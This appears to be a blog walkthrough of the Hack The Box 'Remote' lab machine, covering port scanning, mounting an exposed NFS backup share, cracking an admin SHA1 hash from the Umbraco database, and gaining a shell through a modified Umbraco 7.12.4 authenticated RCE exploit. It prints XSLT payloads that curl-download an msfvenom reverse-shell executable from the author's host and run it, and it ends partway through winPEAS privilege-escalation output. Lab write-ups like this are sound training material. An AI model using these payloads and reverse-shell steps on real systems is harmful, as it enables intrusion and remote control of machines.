HTB Remote WalkThrough

Welcome to my HTB Remote walk through, I found this to be a challenging machine despite other users rating this as simple!

HTB Remote WalkThrough

Welcome to my HTB Remote walk through, I found this to be a challenging machine despite other users rating this as simple. I don't know what will happen when I try one other users rate as difficult!

Lets jump right in with my usual nmap scan:

nmap -p 1-65535 -T4 -A -v 10.10.10.180

[...]
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
3359/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47264/tcp open  tcpwrapped
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[...]


A large number of open ports! I see that is a Windows machine so I try a standard enumeration but this time I'm not so lucky, everything is closed. The command I use is a follows:

enum4linux 10.10.10.180


There's also a web portal on the standard port 80, so I start to navigate it and to collect some information that could be useful in the future:

http://10.10.10.180/

Strange name on the footer: Wile E. Coyote
I understand which CMS is used: Umbraco HQ

Here we can identify five possible users:
http://10.10.10.180/people/

An interesting todo list:
http://10.10.10.180/about-us/todo-list-for-the-starter-kit/

And the access to the CMS administration:
http://10.10.10.180/umbraco/#/forms

I tried to recover the password, but is an email recovery system.

My first approach to the portal is to try some standard investigation with dirb or a similar tool (dirb is ok if you don't need to identify a custom path), but nothing that I have already found:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote$ dirb http://10.10.10.180/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Apr  1 19:26:04 2020
URL_BASE: http://10.10.10.180/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.180/ ----
+ http://10.10.10.180/about-us (CODE:200|SIZE:5441)
+ http://10.10.10.180/blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/Blog (CODE:200|SIZE:5001)
+ http://10.10.10.180/contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/Contact (CODE:200|SIZE:7880)
+ http://10.10.10.180/home (CODE:200|SIZE:6703)
+ http://10.10.10.180/Home (CODE:200|SIZE:6703)
+ http://10.10.10.180/install (CODE:302|SIZE:126)
+ http://10.10.10.180/intranet (CODE:200|SIZE:3323)
+ http://10.10.10.180/master (CODE:500|SIZE:3420)
+ http://10.10.10.180/people (CODE:200|SIZE:6739)
+ http://10.10.10.180/People (CODE:200|SIZE:6739)
+ http://10.10.10.180/person (CODE:200|SIZE:2741)
+ http://10.10.10.180/product (CODE:500|SIZE:3420)
+ http://10.10.10.180/products (CODE:200|SIZE:5328)
+ http://10.10.10.180/Products (CODE:200|SIZE:5328)
+ http://10.10.10.180/umbraco (CODE:200|SIZE:4040)

-----------------
END_TIME: Wed Apr  1 19:39:38 2020
DOWNLOADED: 4612 - FOUND: 17


Ok, it seems that we have to break out a serious tool; open metasploit and search. Our contact point is the portal for now (I'm concentrating on it, but remember that we have a huge number of ports to check), so try to search the first information we have identified: Umbraco CMS.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote$ msfconsole

[...]

msf5 > search umbraco

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/windows/http/umbraco_upload_aspx  2012-06-28       excellent  No     Umbraco CMS Remote Command Execution


There's only one exploit and it is a "remote command execution", lady luck is looking in this direction... maybe.

msf5 > use exploit/windows/http/umbraco_upload_aspx
msf5 exploit(windows/http/umbraco_upload_aspx) > options

Module options (exploit/windows/http/umbraco_upload_aspx):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /umbraco/        yes       The URI path of the Umbraco login page
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1


msf5 exploit(windows/http/umbraco_upload_aspx) > set rhosts 10.10.10.180
rhosts => 10.10.10.180
msf5 exploit(windows/http/umbraco_upload_aspx) > exploit

[*] Started reverse TCP handler on 10.10.15.105:4444 
[*] Uploading 372929 bytes through /umbraco/webservices/codeEditorSave.asmx...
[*] Uploading to /umbraco/qjqjgVIA.aspx
[*] Didn't get the expected 500 error code /umbraco/webservices/codeEditorSave.asmx [500 OK]. Trying to execute the payload anyway
[*] Executing /umbraco/qjqjgVIA.aspx...
[-] Execution failed on /umbraco/qjqjgVIA.aspx [404 Not Found]
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/umbraco_upload_aspx) > 


Mmmm, no... it seems not to be vulnerable. I chose to not go down the Umbraco route, so I continue to search on google some other possible attacks. Something comes out, but again, nothing that works. Here some link:

This is an explanation about how it work the exploit used in metasploit
https://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html

Like the previous
https://www.acunetix.com/vulnerabilities/web/umbraco-cms-remote-code-execution/

It seems to be the same concept, but using a different service on the CMS, there's also an interesting small form that allows to you to understand if the specific CMS you have targeted is vulnerable, unfortunately, our target machine seems to be fixed
https://markitzeroday.com/umbraco/lfi/2017/05/01/umbraco-lfi-exploitation.html

Another version that won't work
https://www.exploit-db.com/exploits/19671

At this point I chose to try other ways, so, remembering that it could be an opened ftp with anonymous access, I try it, but also this time, no ways are visible:

in7rud3r@kali:~/Dropbox/hackthebox$ ftp
ftp> open 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:in7rud3r): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> 


Having no particular ideas, I start to search exploit by port number, read on the forum that someone suggests concentrating on the nfs service (it seems to be on the port number 2049), so I try an exploit that includes that specific port, but nothing good.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ python 3604.py 10.10.10.180
[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit
[+] Author: Shirkdog
[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: 10.10.10.180 Port: 0
Traceback (most recent call last):
  File "3604.py", line 221, in <module>
    GetMediaSvrPort(target)
  File "3604.py", line 194, in GetMediaSvrPort
    ExploitMediaSvr(target,port,1)
  File "3604.py", line 201, in ExploitMediaSvr
    sock.connect((target, port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused


Finally, navigating on the web, I found something

Exploiting NFS Share
Recently while performing a network-level penetration testing activity for one of the clients, I came across a vulnerability which was used to compromise

Well, my luck is that some people (who tackeld this machine earlier) report that the machine is not stable and some commands return an error, but the way is correct, so I start to try and re-try, when...

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ showmount -e 10.10.10.180
rpc mount export: RPC: Unable to receive; errno = Connection refused

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)


...the command works! Let me explain; this command checks and returns the availability of the sharing folder on the remote target for that specific command. In this case, the backup folder of the site is shared. Then, as described in the original tutorial, now we can connect this folder and look inside. So, I create a folder on my local computer and connect it on the shared folder.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ mkdir remote_attack
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ sudo mount -t nfs 10.10.10.180:/site_backups ./remote_attack/
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ 

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack$ cd remote_attack/
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack/remote_attack$ ls -la
total 123
drwx------ 2 nobody   4294967294  4096 Feb 23 19:35 .
drwxr-xr-x 3 in7rud3r in7rud3r    4096 Apr  4 15:18 ..
drwx------ 2 nobody   4294967294    64 Feb 20 18:16 App_Browsers
drwx------ 2 nobody   4294967294  4096 Feb 20 18:17 App_Data
drwx------ 2 nobody   4294967294  4096 Feb 20 18:16 App_Plugins
drwx------ 2 nobody   4294967294    64 Feb 20 18:16 aspnet_client
drwx------ 2 nobody   4294967294 49152 Feb 20 18:16 bin
drwx------ 2 nobody   4294967294  8192 Feb 20 18:16 Config
drwx------ 2 nobody   4294967294    64 Feb 20 18:16 css
-rwx------ 1 nobody   4294967294   152 Nov  1  2018 default.aspx
-rwx------ 1 nobody   4294967294    89 Nov  1  2018 Global.asax
drwx------ 2 nobody   4294967294  4096 Feb 20 18:16 Media
drwx------ 2 nobody   4294967294    64 Feb 20 18:16 scripts
drwx------ 2 nobody   4294967294  8192 Feb 20 18:16 Umbraco
drwx------ 2 nobody   4294967294  4096 Feb 20 18:16 Umbraco_Client
drwx------ 2 nobody   4294967294  4096 Feb 20 18:16 Views
-rwx------ 1 nobody   4294967294 28539 Feb 20 06:57 Web.config


As supposed we have access to the backup of the site, could be interesting, also if probably will not the latest version. Start to navigate inside the file and search for something interesting. Here some files and section that could be interesting.

Web.config

[...]
<section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, log4net" requirePermission="false" />
[...]
<umbracoConfiguration>
	<settings configSource="config\umbracoSettings.config" />
	<BaseRestExtensions configSource="config\BaseRestExtensions.config" />
	<FileSystemProviders configSource="config\FileSystemProviders.config" />
	<dashBoard configSource="config\Dashboard.config" />
<HealthChecks configSource="config\HealthChecks.config" />
</umbracoConfiguration>
[...]
<microsoft.scripting configSource="config\scripting.config" />
<clientDependency configSource="config\ClientDependency.config" />
<Examine configSource="config\ExamineSettings.config" />
<ExamineLuceneIndexSets configSource="config\ExamineIndex.config" />
<log4net configSource="config\log4net.config" />
[...]
	<add key="umbracoConfigurationStatus" value="7.12.4" />
[...]
<connectionStrings>
	<remove name="umbracoDbDSN" />
	<add name="umbracoDbDSN" connectionString="Data Source=|DataDirectory|\Umbraco.sdf;Flush Interval=1;" providerName="System.Data.SqlServerCe.4.0" />
	<!-- Important: If you're upgrading Umbraco, do not clear the connection string / provider name during your web.config merge. -->
</connectionStrings>
[...]
<system.net>
	<mailSettings>
  <smtp from="[email protected]">
			<network host="127.0.0.1" userName="username" password="password" />
		</smtp>
	</mailSettings>
</system.net>
[...]
<machineKey validationKey="2D56EBC66956E070A0B01081434DA66BEDF1C7241EC4BEEC7FAB3E6A0ABDE4F5" decryptionKey="5679E8E158BC850DE4A7172AA5F651D357EB4A5343A5DD03F9F9B022B5EEAB69" validation="HMACSHA256" decryption="AES" /></system.web>


We can understand that:

  • Log4Net library are used as logging system
  • The location of the Umbraco's config file and other files
  • The Umbraco CMS version
  • Connection string to the database (an sdf file, that is a SQL Compact Database)
  • Configured SMTP server section (sure that credentials don't be useful)
  • A validation key that I don't know, but probably should be useful and I write down to remember it

log4net.config

  <file type="log4net.Util.PatternString" value="App_Data\Logs\UmbracoTraceLog.%property{log4net:HostName}.txt" />


Unique information from here is the location of the logging file.

UmbracoTraceLog.intranet.txt

In the logging file, finally, I found something interesting. I start reading line by line, until some information attracts my attention, after, searching better this information, I found some other rows that report the data that could be interesting for us.

 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username [email protected] from IP address 192.168.195.1
 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: [email protected] logged in from IP address 192.168.195.1
[...]
 2020-02-20 00:14:42,175 [P4408/D20/T42] INFO  Umbraco.Web.Editors.AuthenticationController - User [email protected] from IP address 192.168.195.1 has logged out
[...]
 2020-02-20 00:29:57,428 [P4408/D20/T42] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username [email protected] from IP address 192.168.195.1
[...]
 2020-02-20 00:30:05,008 [P4408/D20/T11] INFO  Umbraco.Web.Editors.AuthenticationController - User [email protected] from IP address 192.168.195.1 has logged out
 2020-02-20 00:30:13,486 [P4408/D20/T42] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username [email protected] from IP address 192.168.195.1


What we can identify here, are two different users: [email protected] and [email protected]. I think we are on the right path this time.

Umbraco.sdf

This file made me waste a lot of time, I tried to open with another pc where I have installed windows and development environment and a set of tools like Visual Studio, SQL Server Management Studio, LinQpad, an sdf file viewer... let me say, is my developer machine. Well, it seems the file is damaged and there was no way to fix it (I think the file is truncated). Anyway, I don't go down again, and I tried to read it with a classical text editor and if I'm lucky the data aren't encrypted and something could be readable.

On the start of the file (more or less), we can identify what it seems to be the users' table:

Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]


Putting the string in a comprehensive text, the string should be separated in this way, identifying the fields of the table. I don't know exactly why, but seems that there's a triple data for each single users (two, if you remember so six records in total).

Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} en-US f8512f97-cab1-4a4b-a49f-0a2054c47a1d
admin [email protected] b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} [email protected] en-US feb1a998-d3bf-406a-b30b-e269d7abdf50
admin [email protected] b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} [email protected] en-US 82756c26-4321-4d27-b429-1b5c7c4f882f

smith [email protected] jxDUCcruzN8rSRlqnfmvqw== AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= {"hashAlgorithm":"HMACSHA256"} [email protected] en-US 7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmith [email protected] jxDUCcruzN8rSRlqnfmvqw== AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts= {"hashAlgorithm":"HMACSHA256"} [email protected] en-US 7e39df83-5e64-4b93-9702-ae257a9b9749
ssmith [email protected] 8+xXICbPe7m5NQ22HfcGlg== RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA= {"hashAlgorithm":"HMACSHA256"} [email protected] en-US 3628acfb-a62c-4ab0-93f7-5ee9724c8d32


I think that the field after the username could be the encrypted password and someone is providing us also the encryption algorithm used. Well, go to decrypt it in a simple way, without particular tools, we can go online and decrypt it.

SHA-1 conversion and SHA-1 reverse lookup
SHA-1 conversion and SHA-1 reverse lookup

And the result is

b8be16afba8c314ad33d812f22a04991b90e2aaa = baconandcheese

I could try it as the administrator of the machine, but, I think I had my dose of luck. I try to enter on the umbraco administration portal with this credentials and I'm inside. Ok, good, I remember one exploit that I exclude because  I need administrative privileges of the portal administrator, so I can back to that and try this time to use it. The specific exploit is the following:

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution.. webapps exploit for ASPX platform

I have to download it and modify as I like. This is another point where I lose huge of hours, for a series of error, trying to download from external url (for example) or using the wrong reverse shell (I don't know why I got stuck with netcat for windows when I could use any), formal and syntax error.

But, let's to go on the right process. First of all, I need a reverse shell, I build it with msfvenom. The name of the shell will be myrs2.exe, with x86 architecture for windows that will call the 10.10.10.180 IP on port 4444 and I chose the shell_reverse_tcp (a standard).

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack/ws-8000$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.14.194 LPORT=4444 -f exe c -e generic/none -o ./myrs2.exe 
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 324 (iteration=0)
generic/none chosen with final size 324
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ./myrs2.exe


Now, I have to upload the file on the remote machine, but I have no access, so I will make available using a web server on my machine and saying to the remote machine to download in a specific folder. For the webserver I use simply the php command that provides this feature natively.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack/ws-8000$ php -S 10.10.14.194:8000 -t ./
PHP 7.3.15-3 Development Server started at Sun Apr  5 11:03:14 2020
Listening on http://10.10.14.194:8000
Document root is /home/in7rud3r/Dropbox/hackthebox/_10.10.10.180 - Remote/attack/ws-8000
Press Ctrl-C to quit.


After trying several times I found a right process that I preferred to divide into three steps to be able to repeat them comfortably. I then created 3 files from the original exploit to be able

  • download the reverse shell
  • verify that the file is available
  • run the downloaded reverse shell

46153-curl-2.py

## upload the exe file with the reverse shell
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c curl -o c:\\\\Windows\\\\temp\\\\myrs2.exe http://10.10.14.194:8000/myrs2.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';


46153-extra.py

## list the directory where should be the reverse shell to be sure it is uploaded
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c dir c:\\\\windows\\\\temp\\\\"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';


46153-ncat.py

## execute the reverse shell
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "c:\\\\windows\\\\temp\\\\myrs2.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';


This section is common to all the files:

## common to all the py files
login = "[email protected]";
password="baconandcheese";
host = "http://10.10.10.180";


To have an output from the second script and understand if the file is available, I put on the bottom of the script, before the "End" message, the output from the exploit, it is in the html format as a result of the page in the administrative section, so I have extracted the interesting section of the html file parsing the result (as yet done some lines before).

## output parsing
soup = BeautifulSoup(r4.text, 'html.parser');
print(soup.find(id="result"))


Ok, but let me explain all the steps with a simple image.

  1. Launch the webserver (php command exposed before)
  2. Launch exploit to download (script 46153-curl-2.py)
  3. The remote machine download and save on the disk the reverse shell
  4. Launch the exploit to list the temp folder and verify that the file is downloaded (script 46153-extra.py)
  5. Launch the listener on the local machine to wait for the reverse shell connection
  6. Launch the exploit that runs the reverse shell on the remote computer (script 46153-ncat.py)
  7. The reverse shell is activated

Well, navigate a bit to arrive in the right folder and...

c:\Users>cd public
cd public

c:\Users\Public>more user.txt
more user.txt
b******************************8

.
..the first flag is here.

Well, for the root flag, this last steps will be useful, we will use them again and again, then, don't forget it because we need them!

We have to recognize again and identify possible new vulnerabilities that will give us the elevated privileges to read the flag.

c:\Users>systeminfo 
systeminfo

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA801
Original Install Date:     2/19/2020, 4:03:29 PM
System Boot Time:          4/5/2020, 7:36:50 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 1,818 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,300 MB
Virtual Memory: In Use:    2,499 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4534119
                           [02]: KB4462930
                           [03]: KB4516115
                           [04]: KB4523204
                           [05]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.180
                                 [02]: fe80::b9c1:cab:e023:8673
                                 [03]: dead:beef::b9c1:cab:e023:8673
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.


Ok, windows server 2019 v 10.0.17763, but many Hotfix installed.

c:\Users>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

ERROR: Unable to get user claims information.


Nothing particular about groups, but, I see an interesting SeImpersonatePrivilege.

Anyway, there's a simple way to identify some possible exploit on a windows machine; let's download winPEAS and upload in the usual way on the remote target.

WinPEAS is a tool that executes a series of check on the system to identify in simple way exploitation on it.

Additional info and documentation are available  to the github link of the project:

carlospolop/privilege-escalation-awesome-scripts-suite
Privilege Escalation Awesome Scripts SUITE (with colors) - carlospolop/privilege-escalation-awesome-scripts-suite

So, download the exe and upload on the remote server with the same process you have to upload the other files, then launch it (from the reverse shell on the remote machine) and wait for the result. Consider that it will provided a lot of information, the reverse shell cannot contain all the output, so, you could lose the initial part of the analysis; take a look the screen and write down anything you think should be interesting, remember that part of the exploit identified will be provided in red color, so, you work is simplified by the colors of the output.

Anyway, for this tutorial, I report the interesting part of the analysis for you.

[...]
  pute(8432)[C:\Users\Public\pute.exe] -- POwn: DefaultAppPool
    Permissions: Service [WriteData/CreateFiles]
    Possible DLL Hijacking folder: C:\Users\Public (Service [WriteData/CreateFiles])
    Command Line: "C:\Users\Public\pute.exe"
[...]
  powershell(5136)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: DefaultAppPool
